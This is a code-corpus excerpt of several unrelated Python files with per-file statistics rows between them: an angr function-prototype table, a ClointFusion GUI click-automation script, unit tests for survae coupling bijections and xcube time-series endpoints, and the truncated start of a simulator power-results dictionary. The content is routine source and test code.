'MFCombineSamples': SimTypeFunction([SimTypeBottom(label="IMFSample"), SimTypeBottom(label="IMFSample"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSample", "pSampleToAdd", "dwMaxMergedDurationInMS", "pMerged"]),
#
'MFSplitSample': SimTypeFunction([SimTypeBottom(label="IMFSample"), SimTypePointer(SimTypeBottom(label="IMFSample"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSample", "pOutputSamples", "dwOutputSampleMaxCount", "pdwOutputSampleCount"]),
}
# Register the prototype table defined above with the SimLibrary for this DLL,
# making the SimTypeFunction signatures available to angr's calling conventions.
lib.set_prototypes(prototypes)
| 360.151613
| 8,410
| 0.736276
| 11,462
| 111,647
| 7.148665
| 0.062642
| 0.136884
| 0.104079
| 0.134223
| 0.897166
| 0.890966
| 0.876297
| 0.863397
| 0.850082
| 0.833398
| 0
| 0.020867
| 0.071135
| 111,647
| 309
| 8,411
| 361.317152
| 0.76924
| 0.000251
| 0
| 0
| 0
| 0
| 0.261468
| 0.042029
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.050633
| 0
| 0.050633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1263a63dc231b8ecbb32bb0b79ff0d5017758d64
| 84
|
py
|
Python
|
tests/__init__.py
|
s-leroux/sql-moins
|
beb65300e4602a0d1dcaccf534df39c071060d40
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
s-leroux/sql-moins
|
beb65300e4602a0d1dcaccf534df39c071060d40
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
s-leroux/sql-moins
|
beb65300e4602a0d1dcaccf534df39c071060d40
|
[
"Apache-2.0"
] | null | null | null |
from tests.parser import *
from tests.formatter import *
from tests.utils import *
| 16.8
| 29
| 0.77381
| 12
| 84
| 5.416667
| 0.5
| 0.415385
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154762
| 84
| 4
| 30
| 21
| 0.915493
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
89dae401f8334c13497ff1b437626cfde768def7
| 2,021
|
py
|
Python
|
Hackathon 4.0_2021-01-08_07-22-55.py
|
ClointFusion-Community/CFC-Projects
|
c6381738ade07e6e8979bbae37400ec2b4e626c5
|
[
"MIT"
] | null | null | null |
Hackathon 4.0_2021-01-08_07-22-55.py
|
ClointFusion-Community/CFC-Projects
|
c6381738ade07e6e8979bbae37400ec2b4e626c5
|
[
"MIT"
] | null | null | null |
Hackathon 4.0_2021-01-08_07-22-55.py
|
ClointFusion-Community/CFC-Projects
|
c6381738ade07e6e8979bbae37400ec2b4e626c5
|
[
"MIT"
] | null | null | null |
# This code is generated automatically by ClointFusion BOT Builder Tool.
import ClointFusion as cf
import time


def _click_snip(snip_path, fallback_xy, wait, clicks='single'):
    """Click the UI element captured in *snip_path* on screen.

    Locates the snip image with ClointFusion's image search (confidence 0.7,
    waiting up to *wait* seconds) and clicks it.  If the search fails,
    falls back to clicking the absolute coordinates recorded at capture
    time (*fallback_xy*).  *clicks* selects 'single'/'double'/'triple'.
    """
    try:
        cf.mouse_click(
            *cf.mouse_search_snip_return_coordinates_x_y(snip_path, conf=0.7, wait=wait),
            left_or_right='left', single_double_triple=clicks)
    # NOTE(review): was a bare `except:`, which also swallowed
    # KeyboardInterrupt/SystemExit; narrowed so Ctrl-C can stop the bot.
    except Exception:
        cf.mouse_click(*fallback_xy, left_or_right='left', single_double_triple=clicks)


# Show the desktop and park the mouse at the screen centre.
cf.window_show_desktop()
cf.mouse_click(int(cf.pg.size()[0] / 2), int(cf.pg.size()[1] / 2))

_click_snip(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\1--1788_368.png',
            (1788, 368), wait=12)
time.sleep(2)
_click_snip(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\2--246_938.png',
            (246, 938), wait=10)
time.sleep(0)
_click_snip(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\3--246_938.png',
            (246, 938), wait=13, clicks='double')
time.sleep(3)
_click_snip(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\4-NewTabGoogleChrome-385_77.png',
            (385, 77), wait=11)
time.sleep(1)

# Type the search query and submit it.
cf.key_write_enter('modi')
time.sleep(0)
cf.key_press('enter')
time.sleep(3)

_click_snip(r'C:\Users\mrmay\AppData\Local\Temp\cf_log_5fa2gg4s_generator\Images\Snips\5-modiGoogleSearchGoogleChrome-1905_57.png',
            (1905, 57), wait=10)
time.sleep(0)
| 48.119048
| 256
| 0.784265
| 347
| 2,021
| 4.262248
| 0.224784
| 0.075727
| 0.089249
| 0.10142
| 0.806626
| 0.789047
| 0.789047
| 0.772143
| 0.741717
| 0.741717
| 0
| 0.058792
| 0.065809
| 2,021
| 41
| 257
| 49.292683
| 0.724576
| 0.034636
| 0
| 0.454545
| 1
| 0.151515
| 0.302719
| 0.246793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.060606
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89e1e0fdcc58fa3523c28ea0543829f7666a6db0
| 5,597
|
py
|
Python
|
survae/tests/transforms/bijections/conditional/coupling/coupling_mixtures.py
|
alisiahkoohi/survae_flows
|
e1747b05524c7ab540a211ed360ab3e67bc3e96d
|
[
"MIT"
] | 262
|
2020-07-05T20:57:44.000Z
|
2022-03-28T02:24:43.000Z
|
survae/tests/transforms/bijections/conditional/coupling/coupling_mixtures.py
|
alisiahkoohi/survae_flows
|
e1747b05524c7ab540a211ed360ab3e67bc3e96d
|
[
"MIT"
] | 17
|
2020-08-15T05:43:34.000Z
|
2022-01-31T12:24:21.000Z
|
survae/tests/transforms/bijections/conditional/coupling/coupling_mixtures.py
|
alisiahkoohi/survae_flows
|
e1747b05524c7ab540a211ed360ab3e67bc3e96d
|
[
"MIT"
] | 35
|
2020-08-24T06:55:37.000Z
|
2022-02-11T05:17:58.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torchtestcase
import unittest
from survae.transforms.bijections.conditional.coupling import *
from survae.nn.layers import ElementwiseParams, ElementwiseParams2d, scale_fn
from survae.tests.transforms.bijections.conditional import ConditionalBijectionTest
class ConditionalGaussianMixtureCouplingBijectionTest(ConditionalBijectionTest):
    """Round-trip test for ConditionalGaussianMixtureCouplingBijection."""

    def test_bijection_is_well_behaved(self):
        mixtures = 8
        batch = 10
        elementwise_params = 3 * mixtures
        self.eps = 5e-5
        for shape in [(6,), (6, 4, 4)]:
            for num_condition in [None, 1]:
                with self.subTest(shape=shape, num_condition=num_condition):
                    x = torch.randn(batch, *shape)
                    context = torch.randn(batch, *shape)
                    # Default split keeps the first 3 of 6 dims and the net
                    # emits 3x params; with num_condition=1 only the first
                    # dim is kept and the net emits 5x params.
                    kept, factor = (3, 3) if num_condition is None else (1, 5)
                    if len(shape) == 1:
                        net = nn.Sequential(
                            nn.Linear(kept + 6, factor * elementwise_params),
                            ElementwiseParams(elementwise_params))
                    else:
                        net = nn.Sequential(
                            nn.Conv2d(kept + 6, factor * elementwise_params,
                                      kernel_size=3, padding=1),
                            ElementwiseParams2d(elementwise_params))
                    bijection = ConditionalGaussianMixtureCouplingBijection(
                        net, num_mixtures=mixtures, num_condition=num_condition)
                    self.assert_bijection_is_well_behaved(
                        bijection, x, context, z_shape=(batch, *shape))
                    z, _ = bijection.forward(x, context=context)
                    # The kept channels must pass through the coupling unchanged.
                    self.assertEqual(x[:, :kept], z[:, :kept])
class ConditionalLogisticMixtureCouplingBijectionTest(ConditionalBijectionTest):
    """Round-trip test for ConditionalLogisticMixtureCouplingBijection."""

    def test_bijection_is_well_behaved(self):
        mixtures = 8
        batch = 10
        elementwise_params = 3 * mixtures
        self.eps = 5e-5
        for shape in [(6,), (6, 4, 4)]:
            for num_condition in [None, 1]:
                with self.subTest(shape=shape, num_condition=num_condition):
                    x = torch.randn(batch, *shape)
                    context = torch.randn(batch, *shape)
                    # Default split keeps the first 3 of 6 dims and the net
                    # emits 3x params; with num_condition=1 only the first
                    # dim is kept and the net emits 5x params.
                    kept, factor = (3, 3) if num_condition is None else (1, 5)
                    if len(shape) == 1:
                        net = nn.Sequential(
                            nn.Linear(kept + 6, factor * elementwise_params),
                            ElementwiseParams(elementwise_params))
                    else:
                        net = nn.Sequential(
                            nn.Conv2d(kept + 6, factor * elementwise_params,
                                      kernel_size=3, padding=1),
                            ElementwiseParams2d(elementwise_params))
                    bijection = ConditionalLogisticMixtureCouplingBijection(
                        net, num_mixtures=mixtures, num_condition=num_condition)
                    self.assert_bijection_is_well_behaved(
                        bijection, x, context, z_shape=(batch, *shape))
                    z, _ = bijection.forward(x, context=context)
                    # The kept channels must pass through the coupling unchanged.
                    self.assertEqual(x[:, :kept], z[:, :kept])
class ConditionalCensoredLogisticMixtureCouplingBijectionTest(ConditionalBijectionTest):
    """Round-trip test for ConditionalCensoredLogisticMixtureCouplingBijection."""

    def test_bijection_is_well_behaved(self):
        bins = 16
        mixtures = 8
        batch = 10
        elementwise_params = 3 * mixtures
        self.eps = 1e-6
        for shape in [(6,), (6, 4, 4)]:
            for num_condition in [None, 1]:
                with self.subTest(shape=shape, num_condition=num_condition):
                    # Censored-logistic inputs live in [0, 1), hence rand not randn.
                    x = torch.rand(batch, *shape)
                    context = torch.randn(batch, *shape)
                    # Default split keeps the first 3 of 6 dims and the net
                    # emits 3x params; with num_condition=1 only the first
                    # dim is kept and the net emits 5x params.
                    kept, factor = (3, 3) if num_condition is None else (1, 5)
                    if len(shape) == 1:
                        net = nn.Sequential(
                            nn.Linear(kept + 6, factor * elementwise_params),
                            ElementwiseParams(elementwise_params))
                    else:
                        net = nn.Sequential(
                            nn.Conv2d(kept + 6, factor * elementwise_params,
                                      kernel_size=3, padding=1),
                            ElementwiseParams2d(elementwise_params))
                    bijection = ConditionalCensoredLogisticMixtureCouplingBijection(
                        net, num_mixtures=mixtures, num_bins=bins,
                        num_condition=num_condition)
                    self.assert_bijection_is_well_behaved(
                        bijection, x, context, z_shape=(batch, *shape))
                    z, _ = bijection.forward(x, context=context)
                    # The kept channels must pass through the coupling unchanged.
                    self.assertEqual(x[:, :kept], z[:, :kept])
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 55.415842
| 167
| 0.60586
| 627
| 5,597
| 5.216906
| 0.127592
| 0.140324
| 0.036686
| 0.062366
| 0.813207
| 0.813207
| 0.806175
| 0.806175
| 0.806175
| 0.787832
| 0
| 0.030242
| 0.291049
| 5,597
| 100
| 168
| 55.97
| 0.794103
| 0
| 0
| 0.77907
| 0
| 0
| 0.001429
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 1
| 0.034884
| false
| 0
| 0.093023
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d648d151b563996d1ca1c9b18232f0f106c64aea
| 14,079
|
py
|
Python
|
test/webapi/controllers/test_time_series.py
|
dzelge/xcube
|
1e5049a227df4a50435d9aac6aacf2bcbaa3e2dd
|
[
"MIT"
] | null | null | null |
test/webapi/controllers/test_time_series.py
|
dzelge/xcube
|
1e5049a227df4a50435d9aac6aacf2bcbaa3e2dd
|
[
"MIT"
] | null | null | null |
test/webapi/controllers/test_time_series.py
|
dzelge/xcube
|
1e5049a227df4a50435d9aac6aacf2bcbaa3e2dd
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from xcube.webapi.controllers.time_series import get_time_series_info, get_time_series_for_point, \
get_time_series_for_geometry, get_time_series_for_geometry_collection
from ..helpers import new_test_service_context
class TimeSeriesControllerTest(unittest.TestCase):
    """Tests for the web-API time-series controller.

    Each test builds the demo service context and compares the controller's
    JSON-style result dicts against hard-coded expected fixtures for the
    'demo' (and weekly 'demo-1w') test datasets.
    """

    def test_get_time_series_for_point_invalid_lat_and_lon(self):
        # A point far outside the demo cube's bounds yields an empty result list.
        ctx = new_test_service_context()
        time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
                                                lon=-150.0, lat=-30.0)
        expected_dict = {'results': []}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_point(self):
        # Point inside the cube over a date window: mixes valid and all-NaN dates.
        ctx = new_test_service_context()
        time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
                                                lon=2.1, lat=51.4,
                                                start_date=np.datetime64('2017-01-15'),
                                                end_date=np.datetime64('2017-01-29'))
        expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
                                      'result': {'average': 3.534773588180542,
                                                 'totalCount': 1,
                                                 'validCount': 1}},
                                     {'date': '2017-01-25T09:35:51Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                     {'date': '2017-01-26T10:50:17Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                     {'date': '2017-01-28T09:58:11Z',
                                      'result': {'average': 20.12085723876953,
                                                 'totalCount': 1,
                                                 'validCount': 1}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_point_one_valid(self):
        # max_valids=1 truncates the series after the first valid observation.
        ctx = new_test_service_context()
        time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
                                                lon=2.1, lat=51.4,
                                                start_date=np.datetime64('2017-01-15'),
                                                end_date=np.datetime64('2017-01-29'),
                                                max_valids=1)
        expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
                                      'result': {'average': 3.534773588180542,
                                                 'totalCount': 1,
                                                 'validCount': 1}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_point_only_valids(self):
        # max_valids=-1 keeps all valid observations but drops the NaN-only dates.
        ctx = new_test_service_context()
        time_series = get_time_series_for_point(ctx, 'demo', 'conc_tsm',
                                                lon=2.1, lat=51.4,
                                                start_date=np.datetime64('2017-01-15'),
                                                end_date=np.datetime64('2017-01-29'),
                                                max_valids=-1)
        expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
                                      'result': {'average': 3.534773588180542,
                                                 'totalCount': 1,
                                                 'validCount': 1}},
                                     {'date': '2017-01-28T09:58:11Z',
                                      'result': {'average': 20.12085723876953,
                                                 'totalCount': 1,
                                                 'validCount': 1}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_point_with_uncertainty(self):
        # The weekly dataset ('demo-1w') additionally reports an 'uncertainty' value.
        ctx = new_test_service_context()
        time_series = get_time_series_for_point(ctx, 'demo-1w', 'conc_tsm',
                                                lon=2.1, lat=51.4,
                                                start_date=np.datetime64('2017-01-15'),
                                                end_date=np.datetime64('2017-01-29'))
        expected_dict = {'results': [{'date': '2017-01-22T00:00:00Z',
                                      'result': {'average': 3.534773588180542,
                                                 'uncertainty': 0.0,
                                                 'totalCount': 1,
                                                 'validCount': 1}},
                                     {'date': '2017-01-29T00:00:00Z',
                                      'result': {'average': 20.12085723876953,
                                                 'uncertainty': 0.0,
                                                 'totalCount': 1,
                                                 'validCount': 1}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_geometry_point(self):
        # A GeoJSON Point geometry must behave like the lon/lat point variant.
        ctx = new_test_service_context()
        time_series = get_time_series_for_geometry(ctx, 'demo', 'conc_tsm',
                                                   dict(type="Point", coordinates=[2.1, 51.4]),
                                                   start_date=np.datetime64('2017-01-15'),
                                                   end_date=np.datetime64('2017-01-29'))
        expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
                                      'result': {'average': 3.534773588180542,
                                                 'totalCount': 1,
                                                 'validCount': 1}},
                                     {'date': '2017-01-25T09:35:51Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                     {'date': '2017-01-26T10:50:17Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                     {'date': '2017-01-28T09:58:11Z',
                                      'result': {'average': 20.12085723876953,
                                                 'totalCount': 1,
                                                 'validCount': 1}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_geometry_polygon(self):
        # A Polygon aggregates over many pixels (see the large validCount values).
        ctx = new_test_service_context()
        time_series = get_time_series_for_geometry(ctx, 'demo', 'conc_tsm',
                                                   dict(type="Polygon", coordinates=[[
                                                       [1., 51.], [2., 51.], [2., 52.], [1., 52.], [1., 51.]
                                                   ]]))
        expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
                                      'result': {'average': 56.0228561816751,
                                                 'totalCount': 1,
                                                 'validCount': 122738}},
                                     {'date': '2017-01-25T09:35:51Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                     {'date': '2017-01-26T10:50:17Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                     {'date': '2017-01-28T09:58:11Z',
                                      'result': {'average': 49.71656646340396,
                                                 'totalCount': 1,
                                                 'validCount': 132716}},
                                     {'date': '2017-01-30T10:46:34Z',
                                      'result': {'average': None, 'totalCount': 1, 'validCount': 0}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_geometry_polygon_one_valid(self):
        # max_valids=1 also applies to geometry aggregation.
        ctx = new_test_service_context()
        time_series = get_time_series_for_geometry(ctx, 'demo', 'conc_tsm',
                                                   dict(type="Polygon", coordinates=[[
                                                       [1., 51.], [2., 51.], [2., 52.], [1., 52.], [1., 51.]
                                                   ]]), max_valids=1)
        expected_dict = {'results': [{'date': '2017-01-16T10:09:22Z',
                                      'result': {'average': 56.0228561816751,
                                                 'totalCount': 1,
                                                 'validCount': 122738}}]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_geometries_incl_point(self):
        # A GeometryCollection wraps each member geometry's results in a list.
        ctx = new_test_service_context()
        time_series = get_time_series_for_geometry_collection(ctx,
                                                              'demo', 'conc_tsm',
                                                              dict(type="GeometryCollection",
                                                                   geometries=[
                                                                       dict(type="Point", coordinates=[2.1, 51.4])]),
                                                              start_date=np.datetime64('2017-01-15'),
                                                              end_date=np.datetime64('2017-01-29'))
        expected_dict = {'results': [[{'date': '2017-01-16T10:09:22Z',
                                       'result': {'average': 3.534773588180542,
                                                  'totalCount': 1,
                                                  'validCount': 1}},
                                      {'date': '2017-01-25T09:35:51Z',
                                       'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                      {'date': '2017-01-26T10:50:17Z',
                                       'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                      {'date': '2017-01-28T09:58:11Z',
                                       'result': {'average': 20.12085723876953,
                                                  'totalCount': 1,
                                                  'validCount': 1}}]]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_for_geometries_incl_polygon(self):
        # Same nesting behaviour for a collection containing a Polygon.
        ctx = new_test_service_context()
        time_series = get_time_series_for_geometry_collection(ctx,
                                                              'demo', 'conc_tsm',
                                                              dict(type="GeometryCollection",
                                                                   geometries=[dict(type="Polygon", coordinates=[[
                                                                       [1., 51.], [2., 51.], [2., 52.], [1., 52.],
                                                                       [1., 51.]
                                                                   ]])]))
        expected_dict = {'results': [[{'date': '2017-01-16T10:09:22Z',
                                       'result': {'average': 56.0228561816751,
                                                  'totalCount': 1,
                                                  'validCount': 122738}},
                                      {'date': '2017-01-25T09:35:51Z',
                                       'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                      {'date': '2017-01-26T10:50:17Z',
                                       'result': {'average': None, 'totalCount': 1, 'validCount': 0}},
                                      {'date': '2017-01-28T09:58:11Z',
                                       'result': {'average': 49.71656646340396,
                                                  'totalCount': 1,
                                                  'validCount': 132716}},
                                      {'date': '2017-01-30T10:46:34Z',
                                       'result': {'average': None, 'totalCount': 1, 'validCount': 0}}]]}
        self.assertEqual(expected_dict, time_series)

    def test_get_time_series_info(self):
        # The info endpoint lists one layer per variable of each demo dataset.
        self.maxDiff = None
        ctx = new_test_service_context()
        info = get_time_series_info(ctx)
        expected_dict = self._get_expected_info_dict()
        self.assertEqual(expected_dict, info)

    @staticmethod
    def _get_expected_info_dict():
        # Builds the expected info payload: shared bounds, the 'demo' dataset's
        # five dates per variable, and the weekly 'demo-1w' dataset's three
        # dates per variable plus a matching '<var>_stdev' layer.
        expected_dict = {'layers': []}
        bounds = {'xmin': 0.0, 'ymin': 50.0,
                  'xmax': 5.0, 'ymax': 52.5}
        demo_times = ['2017-01-16T10:09:22Z',
                      '2017-01-25T09:35:51Z',
                      '2017-01-26T10:50:17Z',
                      '2017-01-28T09:58:11Z',
                      '2017-01-30T10:46:34Z']
        demo_variables = ['c2rcc_flags',
                          'conc_chl',
                          'conc_tsm',
                          'kd489',
                          'quality_flags']
        for demo_variable in demo_variables:
            dict_variable = {'name': f'demo.{demo_variable}', 'dates': demo_times, 'bounds': bounds}
            expected_dict['layers'].append(dict_variable)
        demo1w_times = ['2017-01-22T00:00:00Z', '2017-01-29T00:00:00Z', '2017-02-05T00:00:00Z']
        for demo_variable in demo_variables:
            dict_variable = {'name': f'demo-1w.{demo_variable}', 'dates': demo1w_times, 'bounds': bounds}
            expected_dict['layers'].append(dict_variable)
            dict_variable = {'name': f'demo-1w.{demo_variable}_stdev', 'dates': demo1w_times, 'bounds': bounds}
            expected_dict['layers'].append(dict_variable)
        return expected_dict
| 62.29646
| 117
| 0.40017
| 1,153
| 14,079
| 4.647875
| 0.112749
| 0.087703
| 0.052249
| 0.06867
| 0.882068
| 0.844561
| 0.838216
| 0.822168
| 0.813025
| 0.803135
| 0
| 0.146626
| 0.483131
| 14,079
| 225
| 118
| 62.573333
| 0.589803
| 0
| 0
| 0.70098
| 0
| 0
| 0.167626
| 0.003693
| 0
| 0
| 0
| 0
| 0.053922
| 1
| 0.058824
| false
| 0
| 0.019608
| 0
| 0.088235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3d757831ced0c808c54a19099c1901ac199f8e6
| 68,660
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_leslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_leslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_leslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.064476,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.253331,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.335857,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.188561,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.32652,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.187268,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.70235,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.134893,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.73557,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0634506,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00683549,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0740694,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0505527,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.13752,
'Execution Unit/Register Files/Runtime Dynamic': 0.0573882,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.196646,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.52332,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
